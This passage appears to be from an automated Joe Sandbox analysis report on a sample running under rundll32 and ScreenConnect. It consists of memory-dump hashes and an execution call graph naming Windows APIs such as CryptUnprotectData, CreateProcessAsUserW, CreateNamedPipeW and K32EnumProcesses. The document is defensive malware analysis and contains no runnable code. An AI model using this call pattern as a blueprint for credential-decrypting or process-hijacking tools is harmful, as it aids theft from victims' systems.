                                                                                                                            • Instruction ID: 041450bf7e0e8ce8362ec204954c9b4f3b460183d2b5a9b6cd380824f3a447e6
                                                                                                                            • Opcode Fuzzy Hash: 410da26a9b4069758325f397a36d4dd6a71bb3f2aa18c8b0b8f7f70a5dc5a998
                                                                                                                            • Instruction Fuzzy Hash: FFD05B7491210CEFCB00DFE4EA0595DBBB5EB44200F1045A9D408D7310DB315F049B95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000003.1731153026.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_3_4f10000_rundll32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72562f5d880c349d715ef942ec96ef794c14f08860d8bc2ea357b872d7ae29b8
                                                                                                                            • Instruction ID: 6ae3b4cf4433cd11cda52c393092e6c2af83a22999817575ca82cd2b9049aaa4
                                                                                                                            • Opcode Fuzzy Hash: 72562f5d880c349d715ef942ec96ef794c14f08860d8bc2ea357b872d7ae29b8
                                                                                                                            • Instruction Fuzzy Hash: AAD017B4A1120CEFCB40EFA8EA4155DBBB9EB45214B1085A8D50CD7200EF316E449B81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000003.1731153026.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_3_4f10000_rundll32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f8aff6dc9409267da8778b0ea2666a0403cd6718c7c29bc5dcc817896d3d7f82
                                                                                                                            • Instruction ID: aaaffef584dfdfd6c5308c3a617d934a8bb05030ff57ec628bf16ad75cd1a42b
                                                                                                                            • Opcode Fuzzy Hash: f8aff6dc9409267da8778b0ea2666a0403cd6718c7c29bc5dcc817896d3d7f82
                                                                                                                            • Instruction Fuzzy Hash: 7FC012E7B15990AFE301810C0C925E36B20ED7250C7894151D0C0C5157E106A05381A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000003.1731153026.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_3_4f10000_rundll32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e42c85a8df79695b4418a39560dd334723948480b704e1bb73bcbe3296e30e7
                                                                                                                            • Instruction ID: b6f5dea4ee198e40556286a52f38e447497c98ffa2f16ee3ca917f396daf6790
                                                                                                                            • Opcode Fuzzy Hash: 5e42c85a8df79695b4418a39560dd334723948480b704e1bb73bcbe3296e30e7
                                                                                                                            • Instruction Fuzzy Hash: BFC04C36200018BBDF552E91A9189FA7F26EF59361F508025FA5985260DA364961AB50

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:14.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:7.2%
                                                                                                                            Total number of Nodes:539
                                                                                                                            Total number of Limit Nodes:33
                                                                                                                            execution_graph 53467 5ea1fa8 CloseHandle 53468 5ea2012 53467->53468 53715 5eac138 53716 5eac14a 53715->53716 53717 5eac18e 53716->53717 53719 5eac4d0 53716->53719 53721 5eac4d5 53719->53721 53720 5eaca20 53721->53720 53724 1f77481 53721->53724 53728 1f77490 53721->53728 53725 1f774ba 53724->53725 53726 1f774d5 53725->53726 53727 1f7f930 2 API calls 53725->53727 53726->53721 53727->53726 53729 1f774ba 53728->53729 53730 1f774d5 53729->53730 53731 1f7f930 2 API calls 53729->53731 53730->53721 53731->53730 53739 5ea2288 53740 5ea22ca 53739->53740 53741 5ea22d0 WaitNamedPipeW 53739->53741 53740->53741 53742 5ea2304 53741->53742 53469 1f736b0 53470 1f736c6 53469->53470 53479 1f74c6e 53470->53479 53471 1f736cc 53472 1f73764 53471->53472 53484 1f7e5e6 53471->53484 53473 1f73739 53489 5822d50 53473->53489 53494 5822d43 53473->53494 53474 1f7375c 53481 1f74c90 53479->53481 53480 1f74cc6 53480->53471 53481->53480 53482 1f74d1d RtlGetVersion 53481->53482 53483 1f74dda 53482->53483 53483->53471 53485 1f7e614 53484->53485 53486 1f7e62e 53484->53486 53485->53486 53499 1f7eaa8 53485->53499 53503 1f7ea99 53485->53503 53486->53473 53490 5822d65 53489->53490 53648 5823018 53490->53648 53662 5823028 53490->53662 53491 5822ed6 53491->53474 53495 5822d65 53494->53495 53497 5823018 2 API calls 53495->53497 53498 5823028 2 API calls 53495->53498 53496 5822ed6 53496->53474 53497->53496 53498->53496 53501 1f7eace 53499->53501 53500 1f7eb06 53500->53486 53501->53500 53507 1f7eb50 53501->53507 53504 1f7eace 53503->53504 53505 1f7eb06 53504->53505 53506 1f7eb50 2 API calls 53504->53506 53505->53486 53506->53505 53508 1f7eb8e 53507->53508 53515 1f7f788 53508->53515 53509 1f7ee2f 53510 1f7edb7 53510->53509 53519 4660ad0 53510->53519 53524 4660a48 53510->53524 53528 46609c0 53510->53528 53516 1f7f7b3 53515->53516 53517 1f7f7ac 53515->53517 53516->53510 53517->53516 53532 1f7f930 53517->53532 53520 4660af2 53519->53520 53521 4660a73 53519->53521 53520->53510 53522 4660510 2 API calls 53521->53522 53523 4660a85 53522->53523 53523->53510 53525 4660a6d 53524->53525 53526 4660510 2 API calls 53525->53526 53527 4660a85 53526->53527 53527->53510 53529 46609ef 53528->53529 53530 4660510 2 API calls 53529->53530 53531 4660a85 53530->53531 53531->53510 53533 1f7f963 53532->53533 53535 1f7f953 53532->53535 53533->53535 53540 1f7f930 2 API calls 53533->53540 53544 46648e2 53533->53544 53551 46648f0 53533->53551 53558 1f7a4c8 53533->53558 53563 1f7a4b8 53533->53563 53568 1f7fab8 53533->53568 53534 1f7f95c 53534->53516 53535->53534 53536 46648e2 2 API calls 53535->53536 53537 46648f0 2 API calls 53535->53537 53536->53535 53537->53535 53540->53535 53546 4664914 53544->53546 53547 4664924 53544->53547 53545 466491d 53545->53535 53546->53545 53575 4666730 53546->53575 53579 46667d0 53546->53579 53550 1f7f930 2 API calls 53547->53550 53550->53546 53553 4664924 53551->53553 53554 4664914 53551->53554 53552 466491d 53552->53535 53557 1f7f930 2 API calls 53553->53557 53554->53552 53555 4666730 2 API calls 53554->53555 53556 46667d0 2 API calls 53554->53556 53555->53552 53556->53552 53557->53554 53559 1f7a4f9 53558->53559 53560 1f7a4ed 53558->53560 53559->53560 53561 46648e2 2 API calls 53559->53561 53562 46648f0 2 API calls 53559->53562 53560->53535 53561->53560 53562->53560 53564 1f7a4f9 53563->53564 53565 1f7a4ed 53563->53565 53564->53565 53566 46648e2 2 API calls 53564->53566 53567 46648f0 2 API calls 53564->53567 53565->53535 53566->53565 53567->53565 53569 1f7fadb 53568->53569 53570 1f7faeb 53568->53570 53572 1f7fae4 53569->53572 53632 4660006 53569->53632 53637 4660040 53569->53637 53574 1f7f930 2 API calls 53570->53574 53572->53535 53574->53569 53576 4666770 53575->53576 53584 4660510 53576->53584 53578 466678b 53578->53545 53580 4666760 53579->53580 53582 46667df 53579->53582 53581 4660510 2 API calls 53580->53581 53583 466678b 53581->53583 53582->53545 53583->53545 53585 4660536 53584->53585 53589 5ea10cc 53584->53589 53598 5ea10d0 53584->53598 53603 5ea10c0 53584->53603 53585->53578 53590 5ea10ea 53589->53590 53591 5ea111a 53589->53591 53595 5ea10cc 2 API calls 53590->53595 53597 5ea1105 53590->53597 53609 5ea1110 53590->53609 53614 5ea1340 53591->53614 53623 5ea1331 53591->53623 53592 5ea1178 53592->53585 53595->53597 53597->53585 53599 5ea10e2 53598->53599 53600 5ea1105 53599->53600 53601 5ea10cc 2 API calls 53599->53601 53602 5ea1110 2 API calls 53599->53602 53600->53585 53601->53600 53602->53600 53604 5ea10cc 2 API calls 53603->53604 53605 5ea10c7 53604->53605 53606 5ea10cc 2 API calls 53605->53606 53607 5ea1110 2 API calls 53605->53607 53608 5ea1105 53605->53608 53606->53608 53607->53608 53608->53585 53610 5ea1138 53609->53610 53612 5ea1340 CreateNamedPipeW CreateNamedPipeW 53610->53612 53613 5ea1331 CreateNamedPipeW CreateNamedPipeW 53610->53613 53611 5ea1178 53611->53597 53612->53611 53613->53611 53615 5ea135d 53614->53615 53616 5ea13e8 53615->53616 53617 5ea1452 CreateNamedPipeW 53615->53617 53621 5ea1340 CreateNamedPipeW 53616->53621 53622 5ea1331 CreateNamedPipeW 53616->53622 53620 5ea1519 53617->53620 53618 5ea1448 53618->53592 53620->53592 53621->53618 53622->53618 53624 5ea133a 53623->53624 53625 5ea13e8 53624->53625 53626 5ea1452 CreateNamedPipeW 53624->53626 53630 5ea1340 CreateNamedPipeW 53625->53630 53631 5ea1331 CreateNamedPipeW 53625->53631 53629 5ea1519 53626->53629 53627 5ea1448 53627->53592 53629->53592 53630->53627 53631->53627 53633 466005f 53632->53633 53636 4660510 2 API calls 53633->53636 53642 4660502 53633->53642 53634 46600d1 53634->53572 53636->53634 53638 466005f 53637->53638 53640 4660502 2 API calls 53638->53640 53641 4660510 2 API calls 53638->53641 53639 46600d1 53639->53572 53640->53639 53641->53639 53643 4660507 53642->53643 53644 4660536 53642->53644 53643->53644 53645 5ea10cc 2 API calls 53643->53645 53646 5ea10c0 2 API calls 53643->53646 53647 5ea10d0 2 API calls 53643->53647 53644->53634 53645->53644 53646->53644 53647->53644 53649 5823027 53648->53649 53652 5822fb4 53648->53652 53674 58230d8 53649->53674 53651 5823049 53656 5823117 CreateNamedPipeW CreateNamedPipeW 53651->53656 53657 5823128 CreateNamedPipeW CreateNamedPipeW 53651->53657 53652->53491 53653 5823068 53660 5823117 CreateNamedPipeW CreateNamedPipeW 53653->53660 53661 5823128 CreateNamedPipeW CreateNamedPipeW 53653->53661 53654 5823086 53654->53491 53656->53653 53657->53653 53660->53654 53661->53654 53663 5823037 53662->53663 53667 58230d8 2 API calls 53662->53667 53668 5823117 2 API calls 53663->53668 53669 5823128 2 API calls 53663->53669 53664 5823049 53670 5823117 2 API calls 53664->53670 53671 5823128 2 API calls 53664->53671 53665 5823068 53672 5823117 2 API calls 53665->53672 53673 5823128 2 API calls 53665->53673 53666 5823086 53666->53491 53667->53663 53668->53664 53669->53664 53670->53665 53671->53665 53672->53666 53673->53666 53677 5823117 2 API calls 53674->53677 53678 5823128 2 API calls 53674->53678 53675 5823100 53679 5823117 2 API calls 53675->53679 53680 5823128 2 API calls 53675->53680 53676 5823037 53681 5823117 53676->53681 53685 5823128 53676->53685 53677->53675 53678->53675 53679->53676 53680->53676 53682 582315a 53681->53682 53683 5823170 53682->53683 53689 46669d8 53682->53689 53683->53683 53686 582315a 53685->53686 53687 5823170 53686->53687 53688 46669d8 2 API calls 53686->53688 53687->53687 53688->53686 53690 4666a08 53689->53690 53691 4666b02 53690->53691 53692 4666a1c 53690->53692 53693 4666b78 53691->53693 53694 46629b0 2 API calls 53691->53694 53698 4666b82 53692->53698 53699 46629b0 53692->53699 53693->53682 53695 4666b66 53694->53695 53695->53682 53698->53682 53700 46629d6 53699->53700 53702 1f7fab8 2 API calls 53700->53702 53701 46629e2 53702->53701 53743 466680f 53744 46667c0 53743->53744 53745 466683f 53743->53745 53746 46667cb 53744->53746 53747 46667d0 2 API calls 53744->53747 53747->53746 53732 5ea1e70 53733 5ea1ec4 ConnectNamedPipe 53732->53733 53734 5ea1f00 53733->53734 53748 5ea0240 53749 5ea0293 CreateProcessAsUserW 53748->53749 53751 5ea0324 53749->53751 53752 5823729 53753 5823748 53752->53753 53762 63a0b85 53752->53762 53765 63a1584 53752->53765 53768 63a0e47 53752->53768 53772 5823818 53752->53772 53789 63a0ead 53752->53789 53793 63a0f48 53752->53793 53796 63a0f3b 53752->53796 53799 58238bd 53752->53799 53763 63a0fa9 53762->53763 53815 63a3962 53763->53815 53766 63a0fa9 53765->53766 53767 63a3962 CryptUnprotectData 53766->53767 53767->53766 53770 63a0e42 53768->53770 53769 63a0f1d 53769->53753 53770->53768 53770->53769 53771 63a3962 CryptUnprotectData 53770->53771 53771->53770 53773 58239c8 53772->53773 53774 5823822 53772->53774 53773->53753 53775 58238fd 53774->53775 53864 5827203 53774->53864 53869 5ea0a16 53774->53869 53874 5825119 53774->53874 53878 5827278 53774->53878 53883 5ea0830 53774->53883 53888 58242d8 53774->53888 53892 5ea0d1c 53774->53892 53897 5ea0a99 53774->53897 53902 5827210 53774->53902 53907 58251b3 53774->53907 53911 5ea0840 53774->53911 53916 58242e8 53774->53916 53920 58251a7 53774->53920 53791 63a0eb1 53789->53791 53790 63a0f1d 53790->53753 53791->53790 53792 63a3962 CryptUnprotectData 53791->53792 53792->53791 53794 63a0f82 53793->53794 53795 63a3962 CryptUnprotectData 53794->53795 53795->53794 53797 63a0f82 53796->53797 53798 63a3962 CryptUnprotectData 53797->53798 53798->53797 53800 582382d 53799->53800 53800->53799 53801 58238fd 53800->53801 53802 5827203 7 API calls 53800->53802 53803 58251a7 7 API calls 53800->53803 53804 58242e8 7 API calls 53800->53804 53805 5ea0840 2 API calls 53800->53805 53806 58251b3 7 API calls 53800->53806 53807 5827210 7 API calls 53800->53807 53808 5ea0a99 2 API calls 53800->53808 53809 5ea0d1c 2 API calls 53800->53809 53810 58242d8 7 API calls 53800->53810 53811 5ea0830 2 API calls 53800->53811 53812 5827278 7 API calls 53800->53812 53813 5825119 7 API calls 53800->53813 53814 5ea0a16 2 API calls 53800->53814 53802->53800 53803->53800 53804->53800 53805->53800 53806->53800 53807->53800 53808->53800 53809->53800 53810->53800 53811->53800 53812->53800 53813->53800 53814->53800 53816 63a39a8 53815->53816 53817 63a39f2 53816->53817 53818 63a3f22 53816->53818 53820 63a3a7e 53817->53820 53823 63a3962 CryptUnprotectData 53817->53823 53825 63a3f60 53817->53825 53819 63a3f84 53818->53819 53829 5826e28 53818->53829 53835 5826e1b 53818->53835 53819->53763 53820->53763 53823->53820 53827 5826e1b CryptUnprotectData 53825->53827 53828 5826e28 CryptUnprotectData 53825->53828 53826 63a3f84 53826->53820 53827->53826 53828->53826 53830 5826e47 53829->53830 53831 5826e53 53829->53831 53830->53819 53841 63a3f98 53831->53841 53849 63a3f88 53831->53849 53832 5826ecf 53832->53819 53836 5826e47 53835->53836 53837 5826e53 53835->53837 53836->53819 53839 63a3f98 CryptUnprotectData 53837->53839 53840 63a3f88 CryptUnprotectData 53837->53840 53838 5826ecf 53838->53819 53839->53838 53840->53838 53842 63a3fbd 53841->53842 53843 63a4071 53841->53843 53842->53843 53846 63a3f98 CryptUnprotectData 53842->53846 53847 63a3f88 CryptUnprotectData 53842->53847 53857 63a4178 53842->53857 53861 63a30dc 53843->53861 53846->53843 53847->53843 53850 63a3fbd 53849->53850 53851 63a4071 53849->53851 53850->53851 53854 63a3f98 CryptUnprotectData 53850->53854 53855 63a3f88 CryptUnprotectData 53850->53855 53856 63a4178 CryptUnprotectData 53850->53856 53852 63a30dc CryptUnprotectData 53851->53852 53853 63a423c 53852->53853 53853->53832 53854->53851 53855->53851 53856->53851 53858 63a418d 53857->53858 53859 63a30dc CryptUnprotectData 53858->53859 53860 63a423c 53859->53860 53860->53843 53862 63a4258 CryptUnprotectData 53861->53862 53863 63a423c 53862->53863 53863->53832 53865 5827223 53864->53865 53866 582726b 53865->53866 53924 5827473 53865->53924 53929 5827480 53865->53929 53866->53774 53870 5ea08b0 53869->53870 53871 5ea093d 53870->53871 53872 4666730 2 API calls 53870->53872 53873 46667d0 2 API calls 53870->53873 53872->53871 53873->53871 53875 58243bb 53874->53875 53876 5824957 53875->53876 53877 5827278 7 API calls 53875->53877 53876->53774 53877->53876 53879 58271fc 53878->53879 53880 582726b 53879->53880 53881 5827473 7 API calls 53879->53881 53882 5827480 7 API calls 53879->53882 53880->53774 53881->53879 53882->53879 53884 5ea0840 53883->53884 53885 5ea093d 53884->53885 53886 4666730 2 API calls 53884->53886 53887 46667d0 2 API calls 53884->53887 53886->53885 53887->53885 53889 5824324 53888->53889 53890 5824957 53889->53890 53891 5827278 7 API calls 53889->53891 53890->53774 53891->53890 53893 5ea08b0 53892->53893 53894 5ea093d 53893->53894 53895 4666730 2 API calls 53893->53895 53896 46667d0 2 API calls 53893->53896 53895->53894 53896->53894 53898 5ea08b0 53897->53898 53899 5ea093d 53898->53899 53900 4666730 2 API calls 53898->53900 53901 46667d0 2 API calls 53898->53901 53900->53899 53901->53899 53904 5827223 53902->53904 53903 582726b 53903->53774 53904->53903 53905 5827473 7 API calls 53904->53905 53906 5827480 7 API calls 53904->53906 53905->53904 53906->53904 53908 58243bb 53907->53908 53909 5824957 53908->53909 53910 5827278 7 API calls 53908->53910 53909->53774 53910->53909 53912 5ea0872 53911->53912 53913 5ea093d 53912->53913 53914 4666730 2 API calls 53912->53914 53915 46667d0 2 API calls 53912->53915 53914->53913 53915->53913 53917 5824324 53916->53917 53918 5824957 53917->53918 53919 5827278 7 API calls 53917->53919 53918->53774 53919->53918 53921 58243bb 53920->53921 53922 5824957 53921->53922 53923 5827278 7 API calls 53921->53923 53922->53774 53923->53922 53925 5827480 53924->53925 53928 582748b 53925->53928 53933 5828d80 53925->53933 53942 5828d90 53925->53942 53928->53865 53930 5828d80 7 API calls 53929->53930 53931 5828d90 7 API calls 53929->53931 53932 582748b 53929->53932 53930->53932 53931->53932 53932->53865 53934 5828d1c 53933->53934 53935 5828d8f 53933->53935 53934->53928 53936 582957e 53935->53936 53937 5828dd1 53935->53937 53950 582c112 53935->53950 53958 582beae 53935->53958 53936->53937 53940 582c112 7 API calls 53936->53940 53941 582beae 7 API calls 53936->53941 53937->53928 53940->53937 53941->53937 53944 5828dcd 53942->53944 53943 582957e 53945 5828dd1 53943->53945 53948 582c112 7 API calls 53943->53948 53949 582beae 7 API calls 53943->53949 53944->53943 53944->53945 53946 582c112 7 API calls 53944->53946 53947 582beae 7 API calls 53944->53947 53945->53928 53946->53943 53947->53943 53948->53945 53949->53945 53952 582bf81 53950->53952 53951 582c141 53951->53936 53952->53951 53966 582e501 53952->53966 53973 582ec9f 53952->53973 53978 582e378 53952->53978 53987 582e607 53952->53987 53992 582ec96 53952->53992 53959 582beb8 53958->53959 53960 582c141 53959->53960 53961 582e501 3 API calls 53959->53961 53962 582ec96 CreateFileA 53959->53962 53963 582e607 CreateFileA 53959->53963 53964 582e378 7 API calls 53959->53964 53965 582ec9f CreateFileA 53959->53965 53960->53936 53961->53959 53962->53959 53963->53959 53964->53959 53965->53959 53967 582e510 53966->53967 53969 582e53f 53967->53969 53997 582f673 53967->53997 53968 582ed86 53968->53968 54002 5ea20b0 53969->54002 54008 5ea20c0 53969->54008 53974 582ecaa 53973->53974 53976 5ea20c0 CreateFileA 53974->53976 53977 5ea20b0 CreateFileA 53974->53977 53975 582ed86 53975->53975 53976->53975 53977->53975 53979 582e3a9 53978->53979 53980 582e3ff 53979->53980 54053 582eef8 53979->54053 53982 582e53f 53980->53982 53983 582f673 2 API calls 53980->53983 53981 582ed86 53981->53981 53985 5ea20c0 CreateFileA 53982->53985 53986 5ea20b0 CreateFileA 53982->53986 53983->53982 53985->53981 53986->53981 53988 582e613 53987->53988 53990 5ea20c0 CreateFileA 53988->53990 53991 5ea20b0 CreateFileA 53988->53991 53989 582ed86 53990->53989 53991->53989 53993 582ecf9 53992->53993 53995 5ea20c0 CreateFileA 53993->53995 53996 5ea20b0 CreateFileA 53993->53996 53994 582ed86 53995->53994 53996->53994 53998 582f68f 53997->53998 54014 582f6e0 53998->54014 54018 582f6f0 53998->54018 54003 5ea20c0 54002->54003 54005 5ea20f7 54003->54005 54031 5ea2210 54003->54031 54005->53968 54006 5ea2210 CreateFileA 54006->54005 54009 5ea20de 54008->54009 54011 5ea20f7 54009->54011 54012 5ea2210 CreateFileA 54009->54012 54010 5ea2120 54013 5ea2210 CreateFileA 54010->54013 54011->53968 54012->54010 54013->54011 54015 582f6f0 54014->54015 54016 582f737 54015->54016 54022 582fae0 54015->54022 54016->54016 54019 582f71b 54018->54019 54020 582f737 54019->54020 54021 582fae0 2 API calls 54019->54021 54021->54020 54023 582faee 54022->54023 54026 46629b0 2 API calls 54023->54026 54027 46629a0 54023->54027 54024 582fb43 54026->54024 54028 46629d6 54027->54028 54030 1f7fab8 CreateNamedPipeW CreateNamedPipeW 54028->54030 54029 46629e2 54030->54029 54032 5ea221f 54031->54032 54037 5ea23ae 54032->54037 54041 5ea23b0 54032->54041 54045 5ea23ac 54032->54045 54033 5ea2120 54033->54006 54038 5ea23b0 54037->54038 54049 5ea06f0 54038->54049 54042 5ea23c3 54041->54042 54043 5ea06f0 CreateFileA 54042->54043 54044 5ea23e8 54043->54044 54044->54033 54046 5ea23c3 54045->54046 54047 5ea06f0 CreateFileA 54046->54047 54048 5ea23e8 54047->54048 54048->54033 54050 5ea2400 CreateFileA 54049->54050 54052 5ea2535 54050->54052 54054 582ef2c 54053->54054 54055 582ef74 54054->54055 54058 63a6ea8 54054->54058 54066 63a6e98 54054->54066 54055->53980 54059 63a6ecc 54058->54059 54061 63a6edc 54058->54061 54060 63a6ed5 54059->54060 54062 63a7028 4 API calls 54059->54062 54063 63a7019 4 API calls 54059->54063 54060->54055 54074 63a7028 54061->54074 54081 63a7019 54061->54081 54062->54059 54063->54059 54067 63a6edc 54066->54067 54068 63a6ecc 54066->54068 54072 63a7028 4 API calls 54067->54072 54073 63a7019 4 API calls 54067->54073 54069 63a6ed5 54068->54069 54070 63a7028 4 API calls 54068->54070 54071 63a7019 4 API calls 54068->54071 54069->54055 54070->54068 54071->54068 54072->54068 54073->54068 54075 63a704d 54074->54075 54077 63a705d 54074->54077 54076 63a7056 54075->54076 54102 63a4860 54075->54102 54076->54059 54088 63a7198 54077->54088 54095 63a71a8 54077->54095 54082 63a7029 54081->54082 54083 63a704d 54082->54083 54086 63a71a8 2 API calls 54082->54086 54087 63a7198 2 API calls 54082->54087 54084 63a4860 ProcessIdToSessionId 54083->54084 54085 63a7056 54083->54085 54084->54083 54085->54059 54086->54083 54087->54083 54090 63a71a8 54088->54090 54089 63a71c8 54089->54075 54091 63a71bf 54090->54091 54093 63a486c K32EnumProcesses 54090->54093 54091->54089 54092 63a733a K32EnumProcesses 54091->54092 54094 63a7372 54092->54094 54093->54090 54094->54075 54099 63a71d2 54095->54099 54101 63a71bf 54095->54101 54096 63a71c8 54096->54075 54097 63a733a K32EnumProcesses 54098 63a7372 54097->54098 54098->54075 54100 63a486c K32EnumProcesses 54099->54100 54099->54101 54100->54099 54101->54096 54101->54097 54103 63a73e0 ProcessIdToSessionId 54102->54103 54104 63a7453 54103->54104 54104->54075 54105 466054a 54106 466055d 54105->54106 54107 466057a 54106->54107 54110 4666892 54106->54110 54114 46668a0 54106->54114 54112 46668c6 54110->54112 54111 466693b 54111->54107 54112->54111 54113 46669d8 2 API calls 54112->54113 54113->54111 54116 46668c6 54114->54116 54115 466693b 54115->54107 54116->54115 54117 46669d8 2 API calls 54116->54117 54117->54115 53703 4665f68 53704 4665f8c 53703->53704 53706 4665f9c 53703->53706 53705 4665f95 53704->53705 53708 4666598 2 API calls 53704->53708 53709 4666598 53706->53709 53708->53704 53710 46665cb 53709->53710 53712 46665bb 53709->53712 53713 1f7f930 2 API calls 53710->53713 53711 46665c4 53711->53704 53712->53711 53714 1f7f930 2 API calls 53712->53714 53713->53712 53714->53712 53735 4661738 53736 4661780 CryptProtectData 53735->53736 53737 466177a 53735->53737 53738 46617c3 53736->53738 53737->53736
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `Q^q$#})m^$3})m^$C})m^$c})m^$s})m^$|)m^
                                                                                                                            • API String ID: 0-1821663592
                                                                                                                            • Opcode ID: 80cc1d51e6e89011858c29f86f9514409ffe9c5713fb12d0458e236353b73a61
                                                                                                                            • Instruction ID: 961309baaddad6e57880cac79285915350f75105f219b8e00d606fd1fd1ac464
                                                                                                                            • Opcode Fuzzy Hash: 80cc1d51e6e89011858c29f86f9514409ffe9c5713fb12d0458e236353b73a61
                                                                                                                            • Instruction Fuzzy Hash: 21E22A74A00229CFDB25DF28C944AA9BBB6FF89304F10859AD909E7354DB71AEC5CF41

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 379 582e378-582e3f7 534 582e3f9 call 582f072 379->534 535 582e3f9 call 582f086 379->535 536 582e3f9 call 582eef8 379->536 387 582e3ff-582e44d call 582f2cf 394 582e482-582e512 387->394 395 582e44f-582e477 387->395 409 582e514-582e539 call 582f673 394->409 410 582e55a-582e5a9 call 582e034 394->410 395->394 412 582e53f-582e555 409->412 421 582e5ab-582e5d9 410->421 422 582e5dc-582e714 call 582e04c 410->422 415 582ecf9-582ed7d 412->415 537 582ed80 call 5ea20c0 415->537 538 582ed80 call 5ea20b0 415->538 421->422 437 582e716-582e722 422->437 438 582e72a-582e7ad 422->438 434 582ed86-582ee31 461 582ee33-582ee36 434->461 462 582ee3f 434->462 437->438 452 582e8e3-582e906 438->452 453 582e7b3-582e7e6 438->453 463 582e908-582e936 452->463 464 582e939-582e961 452->464 468 582e8c6 453->468 469 582e7ec-582e80c 453->469 461->462 466 582ee40 462->466 463->464 477 582e963-582e991 464->477 478 582e997-582e9c4 464->478 466->466 471 582e8cb-582e8d2 468->471 479 582e812-582e81b 469->479 480 582e8b1-582e8c4 469->480 475 582e8e0-582e8e1 471->475 476 582e8d4 471->476 475->452 476->475 477->478 486 582e9f6-582ea22 478->486 487 582e9c6-582e9f0 478->487 479->468 482 582e821-582e82f 479->482 480->471 490 582e8a1-582e8ab 482->490 491 582e831-582e846 482->491 496 582ea54-582eaff 486->496 497 582ea24-582ea4e 486->497 487->486 490->479 490->480 494 582e894-582e896 491->494 495 582e848-582e892 491->495 494->490 495->494 515 582eb31-582eb74 496->515 516 582eb01-582eb2b 496->516 497->496 524 582eb76-582ebb8 515->524 525 582ebba-582ebd6 515->525 516->515 524->525 527 582ebe4 525->527 528 582ebd8 525->528 527->415 528->527 534->387 535->387 536->387 537->434 538->434
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +Cg$3&)m^$C&)m^$S&)m^$c&)m^$s&)m^$Eg
                                                                                                                            • API String ID: 0-3372171240
                                                                                                                            • Opcode ID: 271c97e433686178110c22c80fd7e4779088f102c7caa906addfc802ae7cef80
                                                                                                                            • Instruction ID: 99e7b45ad06a98337fe54262170a2ff02172762f76501781b84acb8d3f8527f3
                                                                                                                            • Opcode Fuzzy Hash: 271c97e433686178110c22c80fd7e4779088f102c7caa906addfc802ae7cef80
                                                                                                                            • Instruction Fuzzy Hash: 04324E74A002158FDB14DF68D895AADBBF6FF88300F1085A9E909E7354DB70AD86CF91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 818 5ea1340-5ea13c6 828 5ea13c8-5ea13ca 818->828 829 5ea13d1-5ea13dd 818->829 828->829 831 5ea13e8-5ea13ea 829->831 832 5ea13df-5ea13e6 829->832 834 5ea13f8-5ea1420 831->834 832->831 833 5ea13ec-5ea13f3 832->833 835 5ea1452-5ea14aa 833->835 836 5ea13f5 833->836 839 5ea1429 834->839 840 5ea1422-5ea1427 834->840 843 5ea14ac-5ea14af 835->843 844 5ea14b2-5ea1517 CreateNamedPipeW 835->844 836->834 841 5ea142e-5ea1442 839->841 840->841 851 5ea1443 call 5ea1340 841->851 852 5ea1443 call 5ea1331 841->852 843->844 847 5ea1519-5ea151f 844->847 848 5ea1520-5ea1541 844->848 845 5ea1448-5ea144f 847->848 851->845 852->845
                                                                                                                            APIs
                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 05EA1504
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateNamedPipe
                                                                                                                            • String ID: 4L^q$d/dq
                                                                                                                            • API String ID: 2489174969-3455392024
                                                                                                                            • Opcode ID: 975b4f3dc284db974b628debf74bebcf6e7a3b2559e54903fbdc09c848375037
                                                                                                                            • Instruction ID: d9b2c0b4de3c5bc3eb7b199ff67dbe52a6df474cfb73366148e3d80927b14566
                                                                                                                            • Opcode Fuzzy Hash: 975b4f3dc284db974b628debf74bebcf6e7a3b2559e54903fbdc09c848375037
